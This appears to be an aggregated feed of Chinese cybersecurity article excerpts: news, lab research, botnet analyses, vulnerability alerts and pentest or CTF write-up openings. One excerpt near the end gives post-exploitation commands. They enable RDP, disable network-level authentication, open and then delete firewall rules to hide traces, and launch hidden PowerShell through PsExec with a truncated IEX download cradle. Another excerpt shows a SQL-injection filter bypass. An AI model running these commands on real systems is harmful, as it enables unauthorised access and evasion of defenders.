近日,中共中央办公厅、国务院办公厅印发《关于推进新型城市基础设施建设打造韧性城市的意见》(以下简称《意见》), […]
Source: 安全牛
新闻速览 •工信部提醒:防范开源文件同步工具rsync多个安全漏洞的风险 •特朗普推翻拜登人工智能行政命令 • […]
Source: 安全牛
刚刚过去的2024年,是GenAI产业发展最为迅猛的一年. 众多人工智能初创公司纷纷投身生成式大语言模型的研究, […]
Source: 安全牛
时光匆匆,2024年的篇章已然落下帷幕. 过去这一年,广东盈世计算机科技有限公司旗下品牌CACTER在邮件安全技 […]
Source: 安全牛
近日,福建省科技厅、工信厅、商务厅联合发布了《福建省科学技术厅等三部门关于印发数字赋能促进县域重点产业链创新发 […]
Source: 安全牛
2024年,人工智能产业在国家与中央层面的高度重视下蓬勃发展,政策引领路径清晰,技术创新不断突破,产业态势越发 […]
Source: 安全牛
5分钟生成一篇结课论文 10分钟做完一个PPT报告 上交的作业充满AI味儿老师头疼不已…… 近日,复旦大学正式 […]
Source: 安全牛
回望2024年,国投智能积极响应国家战略,在数字政务业务领域守正创新,持续突破,以科技创新为引擎,驱动数字政务 […]
Source: 安全牛
新闻速览 •工信部等十四部门联合印发《关于加强极端场景应急通信能力建设的意见》 •一前中情局分析员承认泄露机密 […]
Source: 安全牛
2024年初,Dark Angels勒索软件团伙入侵了一家大型美国上市公司,窃取了高达100TB的企业数据,并 […]
Source: 安全牛
1月20日,绿盟科技发布2024年度业绩预告,预计2024年度公司实现营业收入22. 60亿元至24. 60亿元, […]
Source: 安全牛
随着量子计算技术的迅猛发展,其对现有密码体系的潜在威胁已成为网络安全领域的焦点议题. 学术界与产业界的共识是,非 […]
Source: 安全牛
科恩实验室自研二进制安全智能分析平台- BinaryAI技术分享:全新功能“二进制比对”的设计与实现. 本文介绍了BinaryAI如何在大模型 BAI-2. 0基础上叠加启发式算法,以函数粒度的语义匹配提高了复杂场景下二进制比对准确率及召回率
Source: 腾讯科恩实验室官方博客
科恩自研二进制安全智能分析平台—BinaryAI带来重要功能更新:发布全新代码匹配模型BAI-2. 0、准确率提升、数据集拓展及用户体验优化. 体验地址:https://www
Source: 腾讯科恩实验室官方博客
为提升静态分析在二进制文件漏洞检测领域效率和可扩展性,科恩孵化并开源二进制文件静态漏洞分析工具BinAbsInspector项目. 代码仓库地址:https://github. com/KeenSecurityLab/BinAbsInspector
Source: 腾讯科恩实验室官方博客
8月20日,在经过参与者们逐步项目推进后,RSoC落下帷幕. 参与RSoC的高校同学与Rizin核心成员Anton以及科恩实验室研究员深度协作交流,以国际开源逆向工程框架Rizin为研究主体,在科恩实验室感受了别样的代码之夏
Source: 腾讯科恩实验室官方博客
8月11日,腾讯安全科恩实验室正式发布在线软件成分分析平台——BinaryAI,第一次将软件成分分析(Software Composition Analysis,SCA)技术推广到日常安全研究. 伴随着开源软件的迅速成长,应用软件中使用开源代码的比重逐年持续增长. 然而,开源代码中的安全问题也让软件市场面临软件供应链安全的挑战
Source: 腾讯科恩实验室官方博客
近年来,5G蜂窝网络被广泛应用. 设备为了加入5G网络,都必须配备一个5G调制解调器,负责调制信号和执行无线电协议. 该组件通常也被称为基带
Source: 腾讯科恩实验室官方博客
科恩实验室在2019年发布了对Telsa Autopilot的研究 [1],其中一项研究成果实现了对车道线系统的攻击. 具体来说,我们在路面部署干扰信息后,可导致车辆经过时对车道线做出错误判断,致使车辆驶入反向车道. 然而这种攻击依赖于人工调试,让攻击不够高效,不够自动化且不够隐蔽
Source: 腾讯科恩实验室官方博客
腾讯安全科恩实验室自研的面向攻击面的Android应用自动化检测系统ApkPecker,正式上线自动化APK脱壳能力. 线上ApkPecker系统提供高成功率的自动化脱壳服务,扩大漏洞扫描的覆盖面. 限时扫码加入ApkPecker技术交流群,体验更高效的Android应用检测服务
Source: 腾讯科恩实验室官方博客
前言 Linux-PAM是可插入认证模块(Pluggable Authentication Modules),PAM使用配置/etc/pam. d/下的文件,来管理对程序的认证方式. 根据/etc/pam
Source: Gorgias
腾讯安全科恩实验室遵循白帽黑客准则对梅赛德斯-奔驰汽车智能互联系统进行信息安全研究. 在对其最新车载信息娱乐系统MBUX的软硬件进行全面深入的研究后,科恩实验室发现多个相关漏洞并成功在车载信息娱乐系统(Head Unit)和车载通讯模块(T-Box)的部分攻击面上实现利用. 科恩实验室第一时间向戴姆勒报告本研究中发现的所有漏洞技术细节并协助进行漏洞修复
Source: 腾讯科恩实验室官方博客
科恩暑期开源程序设计项目-RSoC(Rizin Summer of Code)是由腾讯安全科恩实验室与国际二进制开源逆向工程框架Rizin联合举办的一场开源程序设计项目,旨在为有能力的高校学生提供大型项目参与机会. 通过线上笔试(micro-tasks)的各大高校参与者将有机会被录用为科恩实验室暑期实习生,以国际开源逆向工程框架Rizin为研究主体,在七月中旬开始以线下的形式进行一场为期三个月的程序设计项目. 期待一个跃跃欲试的你加入科恩大家庭,与小伙伴们一起玩转二进制黑魔法
Source: 腾讯科恩实验室官方博客
CCF-腾讯犀牛鸟基金(以下简称犀牛鸟基金)于2013年由腾讯公司和中国计算机学会(CCF)共同发起,致力于面向海内外青年学者搭建产学研合作及学术交流的平台. 8年来,犀牛鸟基金为全球范围内最具创新力的青年学者提供了解产业真实问题,接触业务实际需求的机会,并通过连接青年学者与企业研发团队的产学科研合作,推动双方学术影响力的提升及研究成果的应用落地,为自主研发技术的探索和创新储备能量
Source: 腾讯科恩实验室官方博客
雷克萨斯从2017年开始已经为多款车型(包括NX、LS、ES等系列)配备新一代的信息娱乐系统,也被称为AVN视听导航设备. 与一些智能网联车载系统相比,如特斯拉中控系统和宝马ConnectedDrive系统,雷克萨斯AVN系统会显得更加传统一些. 从安全的角度来看,它能够很大程度上降低被潜在的网络安全问题攻击的可能性
Source: 腾讯科恩实验室官方博客
腾讯安全科恩实验室正式加入致力于推广开源车载信息娱乐系统(IVI)软件的非营利汽车联盟GENIVI. 作为联盟新成员,科恩将在后续的合作中,输出在智能网联汽车领域安全能力,推动GENIVI联盟在智能网联汽车设计标准、开源软件、系统平台等方面的安全能力建设
Source: 腾讯科恩实验室官方博客
在过去的两年里,腾讯科恩实验室对特斯拉汽车的安全性进行了深入的研究并在Black Hat 2017与Black Hat 2018安全会议上两次公开分享了我们的研究成果. 我们的研究成果覆盖了车载系统的多个组件. 我们展示了如何攻入到特斯拉汽车的CID、IC、网关以及自动驾驶模块
Source: 腾讯科恩实验室官方博客
前言腾讯安全科恩实验室《Order Matters: Semantic-Aware Neural Networks for Binary Code Similarity Detection》论文入选人工智能领域顶级学术会议AAAI-20. 研究核心是利用AI算法解决大规模二进制程序函数相似性分析的问题,本文将深入对该论文进行解读,完整论文可以通过访问以下链接获取: Order Matters: Semantic-Aware Neu for Binary Code Similarity Detection
Source: 腾讯科恩实验室官方博客
概述2024年5月29日,美国司法部发布通告,声称其执法活动摧毁了"史上最大的僵尸网络" 911 S5,查封了相关域名
Source: 360 Netlab Blog - 360
Overview On Oct 21, 2022, 360Netlab's honeypot system captured a suspicious ELF file ee07a74d12c0bb3594965b51d0e45b6f, which propagated via F5 vulnerability with zero VT detection, our system observces that it communicates with IP 45. 9. 150
Source: 360 Netlab Blog - 360
概述 2022年10月21日,360Netlab的蜜罐系统捕获了一个通过F5漏洞传播,VT 0检测的可疑ELF文件ee07a74d12c0bb3594965b51d0e45b6f,流量监控系统提示它和
Source: 360 Netlab Blog - 360
概述 近期,我们的BotMon系统连续捕获到一个由Go编写的DDoS类型的僵尸网络家族,它用于DDoS攻击,使用了包括SSH/Telnet弱口
Source: 360 Netlab Blog - 360
Origins P2P networks are more scalable and robust than traditional C/S structures, and these advantages were recognized by the botnet authors early on and used in their botnets. In terms of time, Storm, which appeared in 2007, can be considered the progenitor of this area, when botnet threats were
Source: 360 Netlab Blog - 360
缘起 P2P结构的网络比传统的C/S结构具有更好的可扩展性和健壮性,这些优点很早就为botnet的作者所认识到并被用到
Source: 360 Netlab Blog - 360
Background On April 13, 2022, 360Netlab first disclosed the Fodcha botnet. After our article was published, Fodcha suffered a crackdown from the relevant authorities, and its authors quickly responded by leaving "Netlab pls leave me alone I surrender" in an updated sample. No surprise, Fodcha's authors
Source: 360 Netlab Blog - 360
背景 2022年4月13日,360Netlab首次向社区披露了Fodcha僵尸网络,在我们的文章发表之后,Fodcha遭受到相关部门的打击,其作者
Source: 360 Netlab Blog - 360
In our daily botnet analysis work, it is common to encounter various loaders. Compared to other types of malware, loaders are unique in that they are mainly used to "promote", i. e
Source: 360 Netlab Blog - 360
在我们的日常botnet分析工作中,碰到各种loader是常事. 跟其它种类的malware相比,loader的特殊之处在于它主要用来“推广”,
Source: 360 Netlab Blog - 360
DGA is one of the classic techniques for botnets to hide their C2s, attacker only needs to selectively register a very small number of C2 domains, while for the defenders, it is difficult to determine in advance which domain names will be generated and registered. 360 netlab has long focused
Source: 360 Netlab Blog - 360
DGA是一种经典的botnet对抗检测的技术,其原理是使用某种DGA算法,结合特定的种子和当前日期,定期生成大量的域名
Source: 360 Netlab Blog - 360
概述 本文聚焦于云上重点资产的扫描攻击、云服务器总体攻击情况分析、热门漏洞及恶意程序的攻击威胁. 360高级
Source: 360 Netlab Blog - 360
概述本文聚焦于云上重点资产的扫描攻击、云服务器总体攻击情况分析、热门漏洞及恶意程序的攻击威胁. 360高级
Source: 360 Netlab Blog - 360
OverviewRecently, CNCERT and 360netlab worked together and discovered a rapidly spreading DDoS botnet on the Internet. The global infection looks fairly big as just in China there are more than 10,000 daily active bots (IPs) and alsomore than 100 DDoS victims beingtargeted on a daily basis. We named
Source: 360 Netlab Blog - 360
腾讯啄木鸟代码安全团队,依托混元大模型的超强代码理解和安全分析能力,在SQL注入威胁检测场景验证中,新增识别上百个漏洞检测策略,相比传统方法人效比提升3. 8倍,在Github高star项目上斩获10+0day漏洞
Source: 腾讯安全响应中心
AI版“赏金猎人”登场,基于混元大模型能力打造的自动漏洞挖掘工具,7*24小时自动感知、追踪、挖橱0day. AI猎人VS黑客的角逐战正式开始
Source: 腾讯安全响应中心
本文聚焦于密钥硬编码的问题,分析了传统检测策略的缺陷,并详细介绍了大模型在该场景下的优势、检测实施方案和效果. 我们将继续推出更多关于大模型在研发安全、网络安全、威胁情报等领域的应用探索与总结
Source: 腾讯安全响应中心
借助混元大模型,腾讯啄木鸟代码安全团队在代码评审(Code Review,下文简称CR)场景下的安全漏洞检出能力取得显著提升,日均发现和阻断300+个代码安全风险,极大提升了公司核心数据资产安全性
Source: 腾讯安全响应中心
著名AI社区Hugging Face开源组件datasets存在不安全特性,可引发供应链后门投毒攻击风险
Source: 腾讯安全响应中心
从流量和主机层入手,分析挖矿木马的防御之策
Source: 腾讯安全响应中心
腾讯洋葱入侵检测系统发现开源软件沙箱主机出现异常行为,跟进发现npm官方仓库的coa、rc被投毒攻击,已经在腾讯软件源紧急拦截相关版本. 目前npm官方仓库已将相应版本的恶意包删除,但由于国内开源镜像站均同步npm官方仓库且存在缓存,所以恶意包还可能通过各个开源镜像站影响广大用户
Source: 腾讯安全响应中心
在新版本容器运行时中适用的攻击手法,并使用新方式把“任意文件写”转化为“远程代码执行”
Source: 腾讯安全响应中心
完整分析从ImageMagick到Ghostscript的攻击利用链
Source: 腾讯安全响应中心
5秒内克隆生成任意声音. 以语音克隆开源项目MockingBird为例看AI项目面临的安全风险
Source: 腾讯安全响应中心
这是Facebook创立以来最严重的一次网络访问事故,在这起故障中,我们又看到了BGP的身影
Source: 腾讯安全响应中心
腾讯蓝军和红军十多年案例经验、总结沉淀
Source: 腾讯安全响应中心
另一种方式的指纹识别
Source: 腾讯安全响应中心
从安全攻击面出发,以防御视角分享我们在云原生安全运营上的一些实践和思考
Source: 腾讯安全响应中心
WhatsApp披露以色列间谍软件公司Paragon利用零点击漏洞攻击90名用户,包括记者和民间社会成员,引发全球关注
Source: FreeBuf互联网安全新媒体平台
DDoS对抗新思路
Source: 腾讯安全响应中心
Chromium内核的安全问题,早已悄无声息地牵动着互联网生活方方面面. 基于对实战经历的复盘,本文将从Chromium架构及安全机制概况入手,剖析Chromium组件在多场景下给企业带来的安全风险并一探收敛方案
Source: 腾讯安全响应中心
与业界先行者相比,我们数据面板、剧本等平台功能方面仍有一些差距,未来也会持续建设
Source: 腾讯安全响应中心
除了门罗币,这种不消耗CPU资源的虚拟货币可能成为黑产的新宠儿,提前预知,方能不乱阵脚
Source: 腾讯安全响应中心
云计算时代,洋葱拥抱云原生方案实践,希望能为大家系统上云提供参考
Source: 腾讯安全响应中心
在VSCode上运行Flutter项目到iOS真机 在开发Flutter应用程序时,我们通常会使用VSCode作为集成开发环境(IDE). VSCode提供了丰富 […]
Source: 体验盒子
错误 解决方法 检查现有配置形式如: 修复:nginx >= 1. 25. 1 的新格式为 更多参考:https://github
Source: 体验盒子
Prism Prism js 是一个轻量级的语法高亮 js / css,广泛使用在各大站点中. 官网:https://prismjs. com/download
Source: 体验盒子
文生图AI,图生图AI,换脸AI,证据照AI,扣图AI等是我们平时比较熟悉的,但如果再下沉一些呢. AI生成UI或插画 getimg. ai Flux AI 图像 […]
Source: 体验盒子
你有没有想过,如何知道移动应用程序是否是使用 Flutter 制作的. 确定 Android 应用是否是使用 Flutter 制作的 FlutterShark& […]
Source: 体验盒子
WordPress 6. 7 为延迟加载的图片添加了 sizes=“auto”. 此功能最近添加到 HTML 规范中,它允许浏览器在从 srcs […]
Source: 体验盒子
这个王慧文清华产品课挺值得一读,特别适合想了解业务逻辑的产品或者工程师一读. 还是那句话,如果自身没有技术背景去做一个科技型或强技术型的产品,是有天花板的. 但有 […]
Source: 体验盒子
Mos 一个用于在MacOS上平滑你的鼠标滚动效果的小工具, 让你的滚轮爽如触控板. 特性 截图 下载及安装 Homebrew安装 Mos可通过Homebrew […]
Source: 体验盒子
您是否希望通过引入更复杂的外观或将其与应用程序的整体主题无缝对齐来增强 Flutter 应用程序中 Google Maps 集成的外观. 新的插件版本将&nbs […]
Source: 体验盒子
一些WordPress用户的部分主题在上传svg、ico、webp文件时出现“ ”的提示,意思是这类图片格式不允许上传,今天这个教程能解决这个问题 WordPr […]
Source: 体验盒子
为大家推荐 cursor, 一款基于 vscode 的 AI IDE 优点 规则文件 https://cursor. directory Copy and add […]
Source: 体验盒子
免费最新在线影视站、动漫番剧站,仅用于测试用途. 支持正版人人有责. 地址来源于百度搜索等网络分享,使用搜索引擎随便搜都能搜到
Source: 体验盒子
报错 Unable to boot device because it cannot be located on disk. 原因分析:清理过模拟器数据,错误挂 […]
Source: 体验盒子
使用Flutter进行项目开发加载H5页面时,打开H5页面需要使用WebView组件. 同时,为了和H5页面进行数据交换,有时候还需要借助JSBridge来实现客 […]
Source: 体验盒子
正常我们在Xcode中来维护版本号,但你会发现如已经设置版本号: 但打包出来的DMG版本却依然是是yaml里的版本号. 解决Flutter 打包MacOS/IO […]
Source: 体验盒子
在深入研究之前,我需要告诉你一些事情. 在媒体和其他来源中有许多关于这个主题的文章,那么这篇文章的必要性是什么. 在本文中,我计划只关注 ThemeDa […]
Source: 体验盒子
Flutter 在 2. 5 之后改变了鼠标滚动行为. 详细请参阅此
Source: 体验盒子
以下均为免费、无需登录的抠图工具. 浏览器在线抠图 AI 抠图应用 https://kt. 94xy
Source: 体验盒子
一、设置应用包名 在Flutter开发中,修改应用程序的包名(也称作Application ID)涉及几个步骤,因为包名是在项目的Android和iOS平台代码 […]
Source: 体验盒子
瑞友天翼应用虚拟化系统远程代码执行漏洞,攻击者可以通过该漏洞执行任意代码,导致系统被攻击与控制
Source: NOSEC 安全讯息平台 - 漏洞预警
WebLogic 存在远程代码执行漏洞(CVE-2023-21931),该漏洞允许未经身份验证的攻击者通过T3、IIOP协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用
Source: NOSEC 安全讯息平台 - 漏洞预警
漏洞描述MinIO 是一种开源的对象存储服务,它兼容 Amazon S3 API,可以在私有云或公有云中使用. MinIO 是一
Source: NOSEC 安全讯息平台 - 漏洞预警
近日, Smartbi官方发布安全更新,其中包含Smartbi 远程命令执行漏洞,未经身份认证的远程攻击者利用此漏洞向系统发送恶意数据,可能执行任意命令,导致系统被攻
Source: NOSEC 安全讯息平台 - 漏洞预警
WebLogic 存在远程代码执行漏洞,该漏洞允许未经身份验证的攻击者通过IIOP协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致WebLogic Server
Source: NOSEC 安全讯息平台 - 漏洞预警
近日,Oracle官方 发布了 2023 年 1 月份的安全更新. 涉及旗下产品(Weblogic Server、Database Server、Java SE、MySQL等)的 327 个漏洞. 此次修复的漏洞中包
Source: NOSEC 安全讯息平台 - 漏洞预警
Harbor 镜像仓库存在配置不当导致的访问控制缺陷,攻击者可通过页面搜索镜像名称,绕过登陆验证逻辑,直接查看结果中未授权的私有镜像仓库并获取仓库信息(Pull
Source: NOSEC 安全讯息平台 - 漏洞预警
如果 Thinkphp 程序开启了多语言功能,攻击者可以通过 get、header、cookie 等位置传入参数,实现目录穿越+文件包含,通过 pearcmd 文件包含这个 trick 即可实现
Source: NOSEC 安全讯息平台 - 漏洞预警
近日,Fortinet修复了一个存在 FortiGate 防火墙和 FortiProxy Web 代理中的身份验证绕过漏洞(CVE-2022-40684),该漏洞可能允许攻击者在易受攻击的设备上执行
Source: NOSEC 安全讯息平台 - 漏洞预警
近日,白帽汇安全研究院监测到微软修复了一个服务器端请求伪造(SSRF)漏洞(CVE-2022-41040)和一个远程代码执行(RCE)漏洞(CVE-2022-41082),CVE-2022-4104
Source: NOSEC 安全讯息平台 - 漏洞预警
0x01 获取webshell 在各种信息搜集中,发现某个ip的端口挂着一个比较老的服务. 首先看到了员工工号和手机号的双重验证,也不知道账号是什么结构组成的,基本上放弃字典爆破这一条路. 于是乎打开之前用灯塔的扫描结果,看看文件泄露是否有什么可用的点
Source: 安全脉搏
环境搭建 直接拉取合适的docker docker 环境: https://hub. docker. com/r/chenaotian/cve-2021-3156 下载glibc-2
Source: 安全脉搏
拿到这个网站,通过对比查询,我们发现 闭合参数 finsh 时,查询出的内容更多 经过进一步判断,确实存在漏洞 不过在测试的时候发现存在一定的过滤 但是可以通过内联注释进行绕过. 这里也是加深了解了内联注释的知识点,之前只会简单的利用 /*. 50000UniON SeLeCt*/ /*
Source: 安全脉搏
记一次攻防演练中幸运的从若依弱口令到后台getshell的过程和分析. 0x01 漏洞发现 首先,我会先把目标的二级域名拿去使用搜索引擎来搜索收集到包含这个目标二级域名的三级域名或者四级域名的网站. 这样子可以快速的定位到你所要测试的漏洞资产
Source: 安全脉搏
前言 导入地址表钩取的方法容易实现但是存在缺陷,若需要钩取的函数不存在导入地址表中,那么我们就无法进行钩取,出现以下几种情况时,导入函数是不会存储在导入地址表中的. 延迟加载:当导入函数还没调用时,导入函数还未写入到导入地址表中. 动态链接:使用LoadLibrary与GetProcAddress函数时,程序是显示获取函数地址的,因此不会写入到导入地址表中
Source: 安全脉搏
本次代码审计使用了白加黑的手法,用黑盒的视角测试功能点,用白盒的方式作为验证. 0x1 XSS guestbook处,可以看到有一个留言板 idea搜索guestbook. 发现代码如下,其中的getModel是获取数据的方法
Source: 安全脉搏
好久前偶遇一个站点,前前后后大概挖了三个月才基本测试完毕,出了好多漏洞,也有不少高危,现在对部分高危漏洞进行总结分析. nday进后台: 开局一个登录框: 通过熊猫头插件提取接口,并结合js分析,跑遍了提取到的路径也没有结果. 尝试弱口令登录,但是由于连用户名提示都没有,也以失败告终
Source: 安全脉搏
在这里分享一下通过拖取 DataCube 代码审计后发现的一些漏洞,包括前台的文件上传,信息泄露出账号密码,后台的文件上传. 当然还有部分 SQL 注入漏洞,因为 DataCube 采用的是 SQLite 的数据库,所以SQL 注入相对来说显得就很鸡肋. 当然可能还有没有发现的漏洞,可以互相讨论
Source: 安全脉搏
前言 最近参与某次攻防演练,通过前期信息收集,发现某靶标单位存在某域名备案. 通过fofa搜索子域名站点,发现存在一个子域名的61000端口开放着一个后台,于是开始进行渗透. 目录扫描 进行目录扫描吗,发现/bin
Source: 安全脉搏
国际赛IrisCTF在前几天举办,遇到了一道有意思的题目,特来总结. 题目 附件如下:babyrevjohnson. tar 解题过程 关键main函数分析如下: int __fastcall main(int argc, const char **argv, const char **envp) { int v4; // [rsp+4h] [rbp-7Ch] int v5; // [rsp+4h] [rbp-7Ch] int v6; // [rsp+8h] [rbp-78h] int v7; // [rsp+Ch] [rbp-74h] char input[104]; // [rsp+10h] [rbp-70h] BYREF unsigned __int64 v9; // [rsp+78h] [rbp-8h] v9 = __readfsqword(0x28u); puts("Welcome to the Johnson's family
Source: 安全脉搏
前言 热补丁的钩取方式是为了解决内联钩取在多线程情况下会出错的情况,使用热补丁的钩取可以避免重复读写指令造成问题. 内联钩取潜在问题 正常情况下,在每次跳转到自定义函数时需要将原始的指令(mov edi,edi)写回CreateProcessW函数内,为了后续正确调用CreateProcesW函数,在调用完毕之后,又需要进行挂钩的处理,即将mov指令修改为jmp指令. 但是在多线程的情况下就可能会出现下列问题,在进行mov指令篡改时可能会发生线程的切换,因为篡改指令的操作不是原子操作
Source: 安全脉搏
前言 在之前几篇文章已经学习了解了几种钩取的方法 ● 浅谈调试模式钩取 ● 浅谈热补丁 ● 浅谈内联钩取原理与实现 ● 导入地址表钩取技术 这篇文章就利用钩取方式完成进程隐藏的效果. 进程遍历方法 在实现进程隐藏时,首先需要明确遍历进程的方法. CreateToolhelp32Snapshot CreateToolhelp32Snapshot函数用于创建进程的镜像,当第二个参数为0时则是创建所有进程的镜像,那么就可以达到遍历所有进程的效果
Source: 安全脉搏
前言 Windows远程桌面简介 远程桌面协议(RDP)是一个多通道(multi-channel)的协议,让使用者连上提供微软终端机服务的计算机(称为服务端或远程计算机) 远程桌面的前置条件 在获取权限后,针对3389进行展开,先查询3389端口是否开启 netstat -ano | findstr 3389 发现没有开启(也有可能更改了端口),则可以通过注册表进行手动启动(需要管理员权限) REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f (开启)REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f (关闭) 若执行失败,可能由于系统版本过旧(以下开启命令适用于Windows Server 2003之前系统) wmic path Win32_TerminalServiceSetting where (__class = "Win32_TerminalServiceSetting") call SetAllowTSConnections 1(开启)wmic path Win32_TerminalServiceSetting where (__class = "Win32_TerminalServiceSetting") call SetAllowTSConnections 0(关闭) 有些运维人员会勾选”仅允许使用网络级别的身份验证的远程桌面的计算机连接”选项,我们也可以通过注册表进行关闭,避免影响连接(开启同理0替换成1) REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f 为了避免运维人员更改了RDP端口,可以确认下RDP端口 reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /V PortNumber 正常若是3389端口为0xd3d(默认是十六进制表示) 在这里还需要保证防火墙等安全设备没有禁止且相互之间网络必须相通,这里防火墙设置只允许单独端口放通,减少运维人员的警觉(只允许3389端口放通) netsh advfirewall firewall add rule name="RemoteDesktop" protocol=TCP dir=in localport=3389 action=allow 通过命令删除防火墙的通行策略(清理痕迹) netsh advfirewall firewall delete rule name="RemoteDesktop" 克隆账户接管administrator桌面 适用场景 在无法获取明文密码或者Hash等凭据,但是想接管实时的administrator桌面 利用步骤(默认情况下需要system权限) 在administrator权限下进行切换(利用PsExec工具进行powershell无文件落地上线system权限) shell "PsExec64. exe -accepteula -s powershell. exe -nop -w hidden -c "IEX ((new-object net
Source: 安全脉搏
前言 前段时间看到普元 EOS Platform 爆了这个洞,Apache James,Kafka-UI 都爆了这几个洞,所以决定系统来学习一下这个漏洞点. JMX 基础 JMX 前置知识 JMX(Java Management Extensions,即 Java 管理扩展)是一个为应用程序、设备、系统等植入管理功能的框架. JMX 可以跨越一系列异构操作系统平台、系统体系结构和网络传输协议,灵活的开发无缝集成的系统、网络和服务管理应用
Source: 安全脉搏
2023年HVV中爆出来的洞了,但是有一些漏洞点修复了,刚好地市级的攻防演练中遇到了一个,想着把可能出现问题的点全部审计一下,顺便熟悉一下. net代码审计. ps:感兴趣的师傅们可以自行根据poc搜索源码
Source: 安全脉搏
Confluence Data Center and Server 是 Atlassian 公司提供的企业级团队协作和知识管理软件,它旨在帮助团队协同工作、共享知识、记录文档和协作编辑等. 经过分析,其 /json/setup-restore 接口存在未授权访问漏洞,攻击者可以通过访问该接口对站点进行恶意恢复,从而导致站点内容被完全替换,以及管理员账号密码的重置
Source: 跳跳糖 - 安全与分享社区
最近一段时间都在审计 Java 代码,也算是积累了一些各式各样小技巧,但总感觉不够体系化. 因此有必要先停下来,跳出业务逻辑并后退一步,更加深入地思考一下漏洞背后的成因
Source: 跳跳糖 - 安全与分享社区
这篇文章介绍内网渗透种的横向移动
Source: 跳跳糖 - 安全与分享社区
回顾上上上…篇发布的文章《打造macOS下”最强”的微信取证工具》中使用 frida 工具从内存中获取到了关键数据,frida objc 的能力都来自于 frida-objc-bridge ,本着好奇探索心理想研究下原理,也没找到相关文章资料,倒是找到不少 frida-java-bridge 的文章. 那么本文将从了解 Objective-C Runtime 开始,例如它的消息发送机制、Method Swizzling 等,再去探索 frida 中的 frida-objc-bridge 实现原理以及它最关键的 choose 方法的实现
Source: 跳跳糖 - 安全与分享社区
前段时间身边的大佬去搞攻防,近源攻击挺有成效的,拿了上千的分数,之前自己也有搞过但是一直没用到攻防上面,整理下相关的方式,后续可以参考参考,近源攻击,顾名思义😏你走近点打他,攻击队通过靠近或者位于攻击目标内部,利用各类智能设备、通信技术、物理接口等方法进行突破,也就是说,攻防期间,除了待在小黑屋里面坐牢,还可以接近目标现场,通过现场的环境进行渗透突破,达到进入内网,获取数据的目的,比起在网上打点,近源攻击能够又快又准的进入目标内网,且方法多种多样,成功率很高,但是有点随缘,运气不好的话,可能你丢的Badusb被保洁阿姨丢掉了或者被保安抓了也不一定,关键还是运气和苟住🤔
Source: 跳跳糖 - 安全与分享社区
一天,我看完了番剧后,闲着无聊审计了一下我用来做内网共享的小工具——"Go HTTP File Server". 这是一个文件服务器,可以快速搭建http服务器共享文件. 启动的默认路径为当前路径(
Source: 跳跳糖 - 安全与分享社区
JDBC(Java DataBase Connectivity)是一种用于执行Sql语句的Java Api,即Java数据库连接,是Java语言中用来规范客户端程序如何来访问数据库的应用程序接口,可以为多种关系数据库提供统一访问,提供了诸如查询和更新数据库中数据的方法,是Java访问数据库的标准规范. 简单理解为链接数据库、对数据库操作都需要通过jdbc来实现
Source: 跳跳糖 - 安全与分享社区
前些时间看了idekctf 2022*的task manager,出题人参考了另一位博主Python原型链污染变体的博文,于是打算写一篇文章简单学习下这种攻击方式和题目中的一些解题技巧等内容等
Source: 跳跳糖 - 安全与分享社区
科恩实验室自研二进制安全智能分析平台- BinaryAI技术分享:全新功能“二进制比对”的设计与实现. 本文介绍了BinaryAI如何在大模型 BAI-2. 0基础上叠加启发式算法,以函数粒度的语义匹配提高了复杂场景下二进制比对准确率及召回率
Source: Keen Security Lab Blog
科恩自研二进制安全智能分析平台—BinaryAI带来重要功能更新:发布全新代码匹配模型BAI-2. 0、准确率提升、数据集拓展及用户体验优化. 体验地址:https://www
Source: Keen Security Lab Blog
为提升静态分析在二进制文件漏洞检测领域效率和可扩展性,科恩孵化并开源二进制文件静态漏洞分析工具BinAbsInspector项目. 代码仓库地址:https://github. com/KeenSecurityLab/BinAbsInspector
Source: Keen Security Lab Blog
8月20日,在经过参与者们逐步项目推进后,RSoC落下帷幕. 参与RSoC的高校同学与Rizin核心成员Anton以及科恩实验室研究员深度协作交流,以国际开源逆向工程框架Rizin为研究主体,在科恩实验室感受了别样的代码之夏
Source: Keen Security Lab Blog
8月11日,腾讯安全科恩实验室正式发布在线软件成分分析平台——BinaryAI,第一次将软件成分分析(Software Composition Analysis,SCA)技术推广到日常安全研究. 伴随着开源软件的迅速成长,应用软件中使用开源代码的比重逐年持续增长. 然而,开源代码中的安全问题也让软件市场面临软件供应链安全的挑战
Source: Keen Security Lab Blog
近年来,5G蜂窝网络被广泛应用. 设备为了加入5G网络,都必须配备一个5G调制解调器,负责调制信号和执行无线电协议. 该组件通常也被称为基带
Source: Keen Security Lab Blog
科恩实验室在2019年发布了对Telsa Autopilot的研究 [1],其中一项研究成果实现了对车道线系统的攻击. 具体来说,我们在路面部署干扰信息后,可导致车辆经过时对车道线做出错误判断,致使车辆驶入反向车道. 然而这种攻击依赖于人工调试,让攻击不够高效,不够自动化且不够隐蔽
Source: Keen Security Lab Blog
腾讯安全科恩实验室自研的面向攻击面的Android应用自动化检测系统ApkPecker,正式上线自动化APK脱壳能力. 线上ApkPecker系统提供高成功率的自动化脱壳服务,扩大漏洞扫描的覆盖面. 限时扫码加入ApkPecker技术交流群,体验更高效的Android应用检测服务
Source: Keen Security Lab Blog
CCF-腾讯犀牛鸟基金(以下简称犀牛鸟基金)于2013年由腾讯公司和中国计算机学会(CCF)共同发起,致力于面向海内外青年学者搭建产学研合作及学术交流的平台. 9年来,犀牛鸟基金为全球范围内最具创新力的青年学者提供了解产业真实问题,接触业务实际需求的机会,并通过连接青年学者与企业研发团队的产学科研合作,推动双方学术影响力的提升及研究成果的应用落地,为自主研发技术的探索和创新储备能量
Source: Keen Security Lab Blog
腾讯安全科恩实验室遵循白帽黑客准则对梅赛德斯-奔驰汽车智能互联系统进行信息安全研究. 在对其最新车载信息娱乐系统MBUX的软硬件进行全面深入的研究后,科恩实验室发现多个相关漏洞并成功在车载信息娱乐系统(Head Unit)和车载通讯模块(T-Box)的部分攻击面上实现利用. 科恩实验室第一时间向戴姆勒报告本研究中发现的所有漏洞技术细节并协助进行漏洞修复
